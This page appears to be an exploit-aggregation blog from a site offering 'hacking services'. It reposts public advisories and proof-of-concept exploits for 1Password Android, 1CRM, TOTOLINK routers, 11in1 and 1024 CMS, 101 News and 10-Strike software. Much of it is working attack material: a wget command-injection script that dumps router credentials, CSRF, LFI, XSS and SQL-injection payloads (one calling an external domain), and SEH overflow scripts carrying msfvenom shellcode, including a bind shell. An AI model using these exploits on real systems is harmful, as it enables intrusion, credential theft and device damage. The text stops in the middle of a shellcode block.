Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863107210

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
############
Description
############


The 1Password application < 7.0 for Android is affected by a Denial Of
Service vulnerability. By starting the activity
com.agilebits.onepassword.filling.openyolo.OpenYoloDeleteActivity or
com.agilebits.onepassword.filling.openyolo.OpenYoloRetrieveActivity from an
external application (since they are exported), it is possible to crash the
1Password instance.

 

############
Poc
############

 

To invoke the exported activity and crash the app, it is possible
to use Drozer:

 

run app.activity.start --component com.agilebits.onepassword
com.agilebits.onepassword.filling.openyolo.OpenYoloDeleteActivity



############
Affected Components
############


com.agilebits.onepassword.filling.openyolo.OpenYoloDeleteActivity
com.agilebits.onepassword.filling.openyolo.OpenYoloRetrieveActivity

 

############
Disclosure timeline
############


2018-07-27 Contacting 1Password

2018-07-30 1Password acknowledges the vulnerability

2018-08-22 The vulnerability is fixed and made public



Valerio Brussani (@val_brux)
HireHackking 
******************************************************************
*                  1CRM On-Premise Software 8.5.7                *
*                           Stored XSS                           *
******************************************************************


////////////////////////////////////////////////////////////////////////////////////

# Exploit Title: 1CRM On-Premise Software 8.5.7 - Cross-Site Scripting
# Date: 19/07/2019
# Exploit Author: Kusol Watchara-Apanukorn
# Vendor Homepage: https://1crm.com/
# Version: 8.5.7 <=
# Tested on: CentOS 7.6.1810 (Core)
# CVE : CVE-2019-14221
////////////////////////////////////////////////////////////////////////////////////


//////////////////////////////////////////////////////////////////////////////////////////////////////////////

1CRM On-Premise Software 8.5.7 allows XSS via a payload that is
mishandled during a Run Report operation.  ///

//////////////////////////////////////////////////////////////////////////////////////////////////////////////


Vulnerability Description:

XSS flaws occur whenever an application includes untrusted data in a
new web page without proper validation or escaping, or updates an
existing web page with user supplied data using a browser API that can
create JavaScript. XSS allows attackers to execute scripts in the
victim’s browser which can hijack user sessions, deface web sites, or
redirect the user to malicious sites.


########################################################################################################################
Attack Narratives and Scenarios:
                                                #

                                                #
**Attacker**
                                                #
1. Login as any user
                                                #
2. Click Email icon
                                                #
3. Click Report
                                                #
4. Click Create Report
                                                #
5. Fill Report Name (In our case we fill Company B)
                                                #
6. Assign to Victim (In our case we assigned to admin)
                                                #
7. Click Column Layout
                                                #
8. Click Add empty column
                                                #
9. Input malicious code (In our case:
<script>alert(document.cookie);</script>)
          #
10. Click Save
                                                #

                                                #
**Victim**
                                                #
1. Click email icon
                                                #
2. Click Report
                                                #
3. Choose report that we recently created (In our case we choose
Company B)                                            #
4. Click Run Report
                                                #
5. Admin cookie will popup
                                                #
########################################################################################################################

PoC

-----------------------------------------

Github: https://github.com/cccaaasser/1CRM-CVE/blob/master/CVE-2019-14221.md


Vulnerability Disclosure Timeline:
==================================

19 July, 19 : Found Vulnerability

19 July, 19 : Vendor Notification

24 July  19 : Vendor Response

24 July  19 : Vendor Fixed

31 July, 19 : Vendor released new patched version 8.5.10
HireHackking 
## Advisory Information

Title: 15 TOTOLINK router models vulnerable to multiple RCEs
Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x00.txt
Blog URL: https://pierrekim.github.io/blog/2015-07-16-15-TOTOLINK-products-vulnerable-to-multiple-RCEs.html
Date published: 2015-07-16
Vendors contacted: None
Release mode: 0days, Released
CVE: no current CVE



## Product Description

TOTOLINK is a brother brand of ipTime which wins over 80% of SOHO
markets in South Korea.
TOTOLINK produces routers routers, wifi access points and network
devices. Their products are sold worldwide.



## Vulnerabilities Summary

The first vulnerability allows to bypass the admin authentication and
to get a direct RCE from the LAN side with a single HTTP request.

The second vulnerability allows to bypass the admin authentication and
to get a direct RCE from the LAN side with a single DHCP request.

There are direct RCEs against the routers which give a complete root
access to the embedded Linux from the LAN side.

The two RCEs affect 13 TOTOLINK products from 2009-era firmwares to
the latest firmwares with the default configuration:

- TOTOLINK A1004 : until last firmware (9.34 - za1004_en_9_34.bin)
- TOTOLINK A5004NS : until last firmware (9.38 - za5004s_en_9_38.bin)
- TOTOLINK EX300 : until last firmware (8.68 - TOTOLINK EX300_8_68.bin
- totolink.net)
- TOTOLINK EX300 : until last firmware (9.36 -
ex300_ch_9_36.bin.5357c0 - totolink.cn)
- TOTOLINK N150RB : until last firmware (9.08 - zn150rb_en_9_08.bin.5357c0)
- TOTOLINK N300RB : until last firmware (9.26 - zn300rb_en_9_26.bin)
- TOTOLINK N300RG : until last firmware (8.70 - TOTOLINK N300RG_8_70.bin)
- TOTOLINK N500RDG : until last firmware (8.42 - TOTOLINK N500RDG_en_8_42.bin)
- TOTOLINK N600RD : until last firmware (8.64 - TOTOLINK N600RD_en_8_64.bin)
- TOTOLINK N302R Plus V1 : until the last firmware 8.82 (TOTOLINK
N302R Plus V1_en_8_82.bin)
- TOTOLINK N302R Plus V2 : until the last firmware 9.08 (TOTOLINK
N302R Plus V2_en_9_08.bin)
- TOTOLINK A3004NS (no firmware available in totolinkusa.com but
ipTIME's A3004NS model was vulnerable to the 2 RCEs)
- TOTOLINK EX150 : until the last firmware (8.82 - ex150_ch_8_82.bin.5357c0)


The DHCP RCE also affects 2 TOTOLINK products from 2009-era firmwares
to the latest firmwares with the default configuration:

- TOTOLINK A2004NS : until last firmware (9.60 - za2004s_en_9_60.bin)
- TOTOLINK EX750 : until last firmware (9.60 - ex750_en_9_60.bin)


Firmwares come from totolink.net and from totolink.cn.

- - From my tests, it is possible to use these vulnerabilities to
overwrite the firmware with a custom (backdoored) firmware.

Concerning the high CVSS score (10/10) of the vulnerabilities and the
longevity of this vulnerability (6+ year old),
the TOTOLINK users are urged to contact TOTOLINK.



## Details - RCE with a single HTTP request

The HTTP server allows the attacker to execute some CGI files.

Many of them are vulnerable to a command inclusion which allows to
execute commands with the http daemon user rights (root).


Exploit code:

$ cat totolink.carnage
#!/bin/sh
if [ ! $1 ]; then
echo "Usage:"
echo $0 ip command
exit 1
fi
wget -qO- --post-data="echo 'Content-type:
text/plain';echo;echo;PATH=$PATH:/sbin $2 $3 $4" http://$1/cgi-bin/sh


The exploits have been written in HTML/JavaScript, in form of CSRF
attacks, allowing people to test their systems in live using their
browsers:
http://pierrekim.github.io/advisories/


o Listing of the filesystem

HTML/JS exploits:

http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-listing.of.the.filesystem.html

Using CLI:

root@kali:~/totolink# ./totolink.carnage 192.168.1.1 ls | head
ash
auth
busybox
cat
chmod
cp
d.cgi
date
echo
false
root@kali:~/totolink#


o How to retrieve the credentials ? (see login and password at the end
of the text file)

HTML/JS exploits:

http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-dump.configuration.including.credentials.html

Using CLI:

kali# ./totolink.carnage 192.168.1.1 cat /tmp/etc/iconfig.cfg
wantype.wan1=dynamic
dhblock.eth1=0
ppp_mtu=1454
fakedns=0
upnp=1
ppp_mtu=1454
timeserver=time.windows.com,gmt22,1,480,0
wan_ifname=eth1
auto_dns=1
dhcp_auto_detect=0
wireless_ifmode+wlan0=wlan0,0
dhcpd=0
lan_ip=192.168.1.1
lan_netmask=255.255.255.0
dhcpd_conf=br0,192.168.1.2,192.168.1.253,192.168.1.1,255.255.255.0
dhcpd_dns=164.124.101.2,168.126.63.2
dhcpd_opt=7200,30,200,
dhcpd_configfile=/etc/udhcpd.conf
dhcpd_lease_file=/etc/udhcpd.leases
dhcpd_static_lease_file=/etc/udhcpd.static
use_local_gateway=1
login=admin
password=admin

Login and password are stored in plaintext, which is a very bad
security practice.


o Current running process:

HTML/JS exploits:

http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-current.process.html

Using CLI:

kali# ./totolink.carnage 192.168.1.1 ps -auxww


o Getting the kernel memory:

HTML/JS exploits:

http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-getting.kernel.memory.html

Using CLI:

kali# ./totolink.carnage 192.168.1.1 cat /proc/kcore


o Default firewall rules:

HTML/JS exploits:

http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-default.firewall.rules.html

Using CLI:

kali# ./iptime.carnage.l2.v9.52 192.168.1.1 iptables -nL


o Opening the management interface on the WAN:

HTML/JS exploits:

http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-opening.the.firewall.html


o Reboot the device:

HTML/JS exploits:

http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-reboot.html


o Brick the device:

HTML/JS exploits:

http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-bricking.the.device.html


An attacker can use the /usr/bin/wget binary located in the file
system of the remote device to plant a backdoor and then execute it as
root.

By the way, d.cgi in /bin/ is an intentional backdoor.



## Details - RCE with a single DHCP request

This vulnerability is the exact inverse of CVE-2011-0997. The DHCPD
server in TOTOLINK devices allows remote attackers to execute
arbitrary commands
via shell metacharacters in the host-name field.

Sending a DHCP request with this parameter will reboot the device:

cat /etc/dhcp/dhclient.conf

send host-name ";/sbin/reboot";

When connecting to the UART port (`screen /dev/ttyUSB0 38400`), we
will see the stdout of the /dev/console device;
the dhcp request will immediately force the reboot of the remote device:


Booting...

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize
@ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h
@ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName
@ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

[...]
WiFi Simple Config v1.12 (2009.07.31-11:35+0000).

Launch iwcontrol: wlan0
Reaped 317
iwcontrol RUN OK
SIGNAL -> Config Update signal progress
killall: pppoe-relay: no process killed
SIGNAL -> WAN ip changed
WAN0 IP: 192.168.2.1
signalling START
Invalid upnpd exit
killall: upnpd: no process killed
upnpd Restart 1
iptables: Bad rule (does a matching rule exist in that chain?)
Session Garbage Collecting:Maybe system time is updated.( 946684825 0 )
Update Session timestamp and try it after 5 seconds again.
ez_ipupdate callback --> time_elapsed: 0
Run DDNS by IP change:  / 192.168.2.1
Reaped 352
iptables: Bad rule (does a matching rule exist in that chain?)
Jan  1 00:00:25 miniupnpd[370]: Reloading rules from lease file
Jan  1 00:00:25 miniupnpd[370]: could not open lease file: /var/run/upnp_pmlist
Jan  1 00:00:25 miniupnpd[370]: HTTP listening on port 2048
Reaped 363
Led Silent Callback
Turn ON All LED
Dynamic Channel Search for wlan0 is OFF
start_signal => plantynet_sync
Do start_signal => plantynet_sync
SIGNAL -> Config Update signal progress
killall: pppoe-relay: no process killed
SIGNAL -> WAN ip changed
Reaped 354
iptables: Bad rule (does a matching rule exist in that chain?)
ez_ipupdate callback --> time_elapsed: 1
Run DDNS by IP change:  / 192.168.2.1
Burst DDNS Registration is denied: iptime -> now:26
Led Silent Callback
Turn ON All LED
/proc/sys/net/ipv4/tcp_syn_retries: cannot create
- - - ---> Plantynet Event : 00000003
- - - ---> PLANTYNET_SYNC_INTERNET_BLOCK_DEVICE


[sending the DHCP request]


[01/Jan/2000:00:01:03 +0000] [01/Jan/2000:00:01:03 +0000] Jan  1
00:01:03 miniupnpd[370]: received signal 15, good-bye
Reaped 392
Reaped 318
Reaped 314
Reaped 290
Reaped 288
Reaped 268
Reaped 370
Reaped 367
- - - ---> PLANTYNET_SYNC_FREE_DEVICE
Restarting system.

Booting...

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize
@ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h
@ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName
@ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Reboot Result from Watchdog Timeout!

- - - ---RealTek(RTL8196E)at 2012.07.06-04:36+0900 v0.4 [16bit](400MHz)
Delay 1 second till reset button
Magic Number: raw_nv 00000000
Check Firmware(05020000) : size: 0x001ddfc8 ---->


[...]


An attacker can use the /usr/bin/wget binary located in the file
system of the remote device to plant a backdoor and then execute it as
root.



## Vendor Response

Due to "un-ethical code" found in TOTOLINK products (= backdoors found
in new TOTOLINK devices), TOTOLINK was not contacted in regard of this
case, but ipTIME was contacted in April 2015 concerning the first RCE.



## Report Timeline

* Jun 01, 2014: First RCE found by Pierre Kim and Alexandre Torres in
ipTIME products.
* Jun 02, 2014: Second RCE found by Pierre Kim in ipTIME products.
* Jun 25, 2015: Similar vulnerabilities found in TOTOLINK products.
* Jul 13, 2015: TOTOLINK silently fixed the HTTP RCE in A2004NS and
EX750 routers.
* Jul 13, 2015: Updated firmwares confirmed vulnerable.
* Jul 16, 2015: A public advisory is sent to security mailing lists.



## Credit

These vulnerabilities were found by Alexandre Torres and Pierre Kim
(@PierreKimSec).



## References

https://pierrekim.github.io/advisories/2015-totolink-0x00.txt
https://pierrekim.github.io/blog/2015-07-16-15-TOTOLINK-products-vulnerable-to-multiple-RCEs.html



## Disclaimer

This advisory is licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
HireHackking 
source: https://www.securityfocus.com/bid/52025/info
  
11in1 is prone to a cross-site request-forgery and a local file include vulnerability.
  
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the affected application.
  
11in1 1.2.1 is vulnerable; other versions may also be affected. 

<form action="http://www.example.com/admin/index.php?class=do&action=addTopic" method="post">
<input type="hidden" name="name" value="New Topic Name here">
<input type="hidden" name="sec" value="3">
<input type="hidden" name="content" value="New Topic Content here">
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>
HireHackking 
source: https://www.securityfocus.com/bid/52025/info

11in1 is prone to a cross-site request-forgery and a local file include vulnerability.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the affected application.

11in1 1.2.1 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?class=../../../tmp/file%00
HireHackking 
source: https://www.securityfocus.com/bid/52306/info
 
11in1 CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
 
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
11in1 1.2.1 is vulnerable; other versions may also be affected. 

http://www.example.com/11in1/admin/tps?id=1'[SQL Injection Vulnerability!]
HireHackking 
source: https://www.securityfocus.com/bid/52306/info

11in1 CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

11in1 1.2.1 is vulnerable; other versions may also be affected. 

http://www.example.com/11in1/admin/comments?topicID=1'[SQL Injection Vulnerability!]
HireHackking 
source: https://www.securityfocus.com/bid/52025/info
 
11in1 is prone to a cross-site request-forgery and a local file include vulnerability.
 
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the affected application.
 
11in1 1.2.1 is vulnerable; other versions may also be affected. 

http://www.example.com/admin/index.php?class=../../../tmp/file%00
HireHackking 
# Exploit Title: 10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)
# Date: 2020-04-01
# Exploit Author: Hodorsec
# Version: v9.32 x86
# Software Link: https://www.10-strike.com/lanstate/lanstate-setup.exe
# Vendor Homepage:  https://www.freecommander.com
# Tested on:        Win7 x86 SP1 - Build 7601

# Description:      
# - Exploits the "Force Check" option when listing the Host Checks in option "Check List". Entering an overly long string, results in a crash which overwrites SEH.

# Reproduction:
# - Use indicated OS or manipulate settings: your mileage may vary due to different offsets on other Windows versions / SP's.
# - Run the script, a TXT file will be generated
# - On the Windows machine, open the TXT file in Wordpad. Copy the contents to clipboard (ctrl+c)
# - Open LANState, use any "Map", for example the "demo_map"
# - Click on tab "Home", click option "Check List"
# - Rightclick on any existing hostname and click "Edit"
# - Paste the value from clipboard in the field "Host address (name)"
# - Next, Next, Finish
# - In the "List of checks" overview, select the modified host and press the spacebar (Force Check)
# - Check results

# WinDBG initial crash output using only A's:
# (c5c.c2c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00002759 ebx=0012f838 ecx=000007f6 edx=0012f880 esi=0781bf78 edi=00130000
# eip=00402e57 esp=0012f7d8 ebp=0012f99c iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\10-Strike LANState\LANState.exe
# LANState+0x2e57:
# 00402e57 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
# 0:000> g
# (c5c.c2c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=0012f98c ebx=0012f98c ecx=05250858 edx=41414141 esi=00000002 edi=0012f7f0
# eip=004053e6 esp=0012f7f8 ebp=0012f99c iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210206
# LANState+0x53e6:
# 004053e6 8b4af8          mov     ecx,dword ptr [edx-8] ds:0023:41414139=????????
# 0:000> g
# (c5c.c2c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=41414141 edx=77f0720d esi=00000000 edi=00000000
# eip=41414141 esp=0012f298 ebp=0012f2b8 iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
# 41414141 ??              ???

#!/usr/bin/python

import sys,struct

# Filename
filename = "10_strike_lanstate-poc.txt"

# Maximum length
maxlen = 10000

# Shellcode, using alphanum chars due to bytes considered to be bad above \x7f
# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -v shellcode
# Payload size: 447 bytes
shellcode = (
"\xdb\xdc\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
"\x4c\x78\x68\x6d\x52\x65\x50\x37\x70\x77\x70\x43\x50\x4d\x59"
"\x39\x75\x36\x51\x59\x50\x32\x44\x6e\x6b\x32\x70\x46\x50\x6e"
"\x6b\x70\x52\x34\x4c\x6e\x6b\x61\x42\x45\x44\x4c\x4b\x54\x32"
"\x47\x58\x36\x6f\x6e\x57\x53\x7a\x66\x46\x46\x51\x79\x6f\x4e"
"\x4c\x37\x4c\x51\x71\x53\x4c\x44\x42\x44\x6c\x61\x30\x4a\x61"
"\x68\x4f\x66\x6d\x73\x31\x49\x57\x59\x72\x58\x72\x30\x52\x56"
"\x37\x4e\x6b\x52\x72\x34\x50\x6c\x4b\x33\x7a\x35\x6c\x6c\x4b"
"\x42\x6c\x57\x61\x74\x38\x6d\x33\x33\x78\x77\x71\x4b\x61\x32"
"\x71\x6e\x6b\x51\x49\x77\x50\x76\x61\x6a\x73\x6e\x6b\x61\x59"
"\x67\x68\x79\x73\x57\x4a\x42\x69\x4e\x6b\x37\x44\x6c\x4b\x43"
"\x31\x4e\x36\x45\x61\x6b\x4f\x6c\x6c\x6a\x61\x48\x4f\x34\x4d"
"\x47\x71\x5a\x67\x37\x48\x39\x70\x62\x55\x4b\x46\x65\x53\x63"
"\x4d\x39\x68\x67\x4b\x73\x4d\x46\x44\x53\x45\x79\x74\x76\x38"
"\x4c\x4b\x63\x68\x66\x44\x43\x31\x48\x53\x72\x46\x4e\x6b\x76"
"\x6c\x70\x4b\x4e\x6b\x61\x48\x57\x6c\x46\x61\x79\x43\x6c\x4b"
"\x54\x44\x6e\x6b\x57\x71\x68\x50\x6e\x69\x30\x44\x76\x44\x45"
"\x74\x53\x6b\x61\x4b\x65\x31\x62\x79\x31\x4a\x30\x51\x39\x6f"
"\x59\x70\x63\x6f\x71\x4f\x50\x5a\x6c\x4b\x56\x72\x4a\x4b\x6c"
"\x4d\x73\x6d\x30\x6a\x77\x71\x6e\x6d\x4d\x55\x4e\x52\x37\x70"
"\x75\x50\x63\x30\x52\x70\x63\x58\x56\x51\x4e\x6b\x42\x4f\x4e"
"\x67\x69\x6f\x49\x45\x4d\x6b\x58\x70\x4d\x65\x6d\x72\x50\x56"
"\x75\x38\x6e\x46\x6f\x65\x6f\x4d\x6d\x4d\x39\x6f\x58\x55\x75"
"\x6c\x63\x36\x73\x4c\x76\x6a\x6b\x30\x59\x6b\x4d\x30\x52\x55"
"\x74\x45\x6f\x4b\x43\x77\x42\x33\x63\x42\x62\x4f\x51\x7a\x77"
"\x70\x73\x63\x69\x6f\x58\x55\x72\x43\x30\x61\x72\x4c\x31\x73"
"\x46\x4e\x45\x35\x63\x48\x63\x55\x47\x70\x41\x41"
)

# Offsets
crash_ebp = 228
crash_nseh = 236
crash_seh = crash_nseh + 4

# Variables
nops = "\x90" * 16                                              # Nops

# Prefix
prefix = "A" * crash_nseh                                       # Filler
nseh = "\x71\x06\x70\x04"                                       # JNO # JO # Jump over NSEH/SEH
seh = struct.pack("<L", 0x0132730f)                             # call dword ptr ss:[ebp-04] # [LANState.exe]
suffix = nops                                                   # Old-school NOP'ing
suffix += shellcode                                             # Magic!
suffix += "D" * (maxlen - len(prefix + nseh + seh + suffix))    # Filler

# Concatenate string for payload
payload = prefix + nseh + seh + suffix                          # Put it all together

try:
    file = open(filename,"wb")
    file.write(payload)
    file.close()
    print "[+] File " + filename + " with size " + str(len(payload)) + " created successfully"
except:
    print "[!] Error creating file!"
    sys.exit(0)
HireHackking 
source: https://www.securityfocus.com/bid/55170/info

1024 CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

1024 CMS 2.1.1 is vulnerable; other versions may also be affected. 

http:// www.example.com/index.php?p=[SQLi]
HireHackking 
source: https://www.securityfocus.com/bid/47282/info

1024cms is prone to multiple cross-site scripting vulnerabilities, multiple local file-include vulnerabilities, and a directory-traversal vulnerability

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the webserver process ad gain access to sensitive information.

1024cms 1.1.0 beta is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?mode=login&processfile=../../../../../../etc/passwd%00
http://www.example.com/index.php?msg=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
http://www.example.com/modules/forcedownload/force_download.php?filename=../../../../../../../etc/passwd
http://www.example.com/index.php?act=../../../../../../etc/passwd%00
http://www.example.com/dashboard.php?act=../../../../../../../etc/passwd%00
http://www.example.com/index.php?msg=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
http://www.example.com/dashboard.php?msg_error=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
http://www.example.com/dashboard.php?msg_okay=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
http://www.example.com/dashboard.php?msg_info=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
http://www.example.com/dashboard.php?msg_attention=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
HireHackking

101 News 1.0 - Multiple-SQLi 

## Title: 101 News-1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 09/16/2023
## Vendor: https://mayurik.com/
## Software: https://www.sourcecodester.com/php/16067/best-online-news-portal-project-php-free-download.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The searchtitle parameter appears to be vulnerable to SQL injection
attacks. The payload '+(select
load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.oastify.com\\utu'))+'
was submitted in the searchtitle parameter. This payload injects a SQL
sub-query that calls MySQL's load_file function with a UNC file path
that references a URL on an external domain. The application
interacted with that domain, indicating that the injected SQL query
was executed.


[+]Payload:
```mysql
---
Parameter: searchtitle (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: searchtitle=-7320%' OR 3167=3167 AND 'urvA%'='urvA

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchtitle=814271'+(select
load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.tupaputka.com\\utu'))+'%'
AND (SELECT 8775 FROM (SELECT(SLEEP(15)))yMEL) AND 'gPWH%'='gPWH

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: searchtitle=814271'+(select
load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.tupaputka.com\\utu'))+'%'
UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(0x71627a6a71,0x4b6d704e6546715a6662496571705179434d6d5a71586b567a4278464c564d61766174626f787063,0x7170767071),NULL,NULL#

## Reproduce:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/101%20News-1.0

## Proof and Exploit:
https://www.nu11secur1ty.com/2023/09/101-news-10-multiple-sqli.html

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
nu11secur1ty <http://nu11secur1ty.com/>
HireHackking 
# Exploit Title: 10-Strike Network Scanner 3.0 - Local Buffer Overflow (SEH)
# Exploit Author: Hashim Jawad - ihack4falafel
# Date: 2018-06-05
# Vendor Homepage: https://www.10-strike.com/
# Vulnerable Software: https://www.10-strike.com/network-scanner/network-scanner.exe
# Tested on: Windows XP Professional - SP3 (x86)
# Disclosure Timeline:
# 06-02-18: Contacted vendor, no response 
# 06-03-18: Contacted vendor, no response
# 06-04-18: Contacted vendor, no response
# 06-05-18: Proof of concept exploit published 

# Steps to reproduce:
# - Copy contents of Evil.txt and paste in 'Host name or address' field under Add host.
# - Right-click on newly created host and click 'Trace route...'.
# - Repeat the second step and boom.
# Notes:
# - '\x00' get converted to '\x20' by the program eliminating the possibility of using [pop, pop, retn] pointers in base binary.
# - All loaded modules are compiled with /SafeSEH.
# - Right-click on newly created host and click 'System information>General' is effected by the same vulnerability with different
#   offsets and buffer size.
# - root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -v shellcode -f python
# - Payload size: 355 bytes

#!/usr/bin/python

shellcode =  ""
shellcode += "\xb8\x2b\x29\xa7\x48\xd9\xe8\xd9\x74\x24\xf4\x5b"
shellcode += "\x29\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\xc0"
shellcode += "\xd5\x45\xbd\xea\xce\x08\x3e\x12\x0f\x6d\xb6\xf7"
shellcode += "\x3e\xad\xac\x7c\x10\x1d\xa6\xd0\x9d\xd6\xea\xc0"
shellcode += "\x16\x9a\x22\xe7\x9f\x11\x15\xc6\x20\x09\x65\x49"
shellcode += "\xa3\x50\xba\xa9\x9a\x9a\xcf\xa8\xdb\xc7\x22\xf8"
shellcode += "\xb4\x8c\x91\xec\xb1\xd9\x29\x87\x8a\xcc\x29\x74"
shellcode += "\x5a\xee\x18\x2b\xd0\xa9\xba\xca\x35\xc2\xf2\xd4"
shellcode += "\x5a\xef\x4d\x6f\xa8\x9b\x4f\xb9\xe0\x64\xe3\x84"
shellcode += "\xcc\x96\xfd\xc1\xeb\x48\x88\x3b\x08\xf4\x8b\xf8"
shellcode += "\x72\x22\x19\x1a\xd4\xa1\xb9\xc6\xe4\x66\x5f\x8d"
shellcode += "\xeb\xc3\x2b\xc9\xef\xd2\xf8\x62\x0b\x5e\xff\xa4"
shellcode += "\x9d\x24\x24\x60\xc5\xff\x45\x31\xa3\xae\x7a\x21"
shellcode += "\x0c\x0e\xdf\x2a\xa1\x5b\x52\x71\xae\xa8\x5f\x89"
shellcode += "\x2e\xa7\xe8\xfa\x1c\x68\x43\x94\x2c\xe1\x4d\x63"
shellcode += "\x52\xd8\x2a\xfb\xad\xe3\x4a\xd2\x69\xb7\x1a\x4c"
shellcode += "\x5b\xb8\xf0\x8c\x64\x6d\x6c\x84\xc3\xde\x93\x69"
shellcode += "\xb3\x8e\x13\xc1\x5c\xc5\x9b\x3e\x7c\xe6\x71\x57"
shellcode += "\x15\x1b\x7a\x46\xba\x92\x9c\x02\x52\xf3\x37\xba"
shellcode += "\x90\x20\x80\x5d\xea\x02\xb8\xc9\xa3\x44\x7f\xf6"
shellcode += "\x33\x43\xd7\x60\xb8\x80\xe3\x91\xbf\x8c\x43\xc6"
shellcode += "\x28\x5a\x02\xa5\xc9\x5b\x0f\x5d\x69\xc9\xd4\x9d"
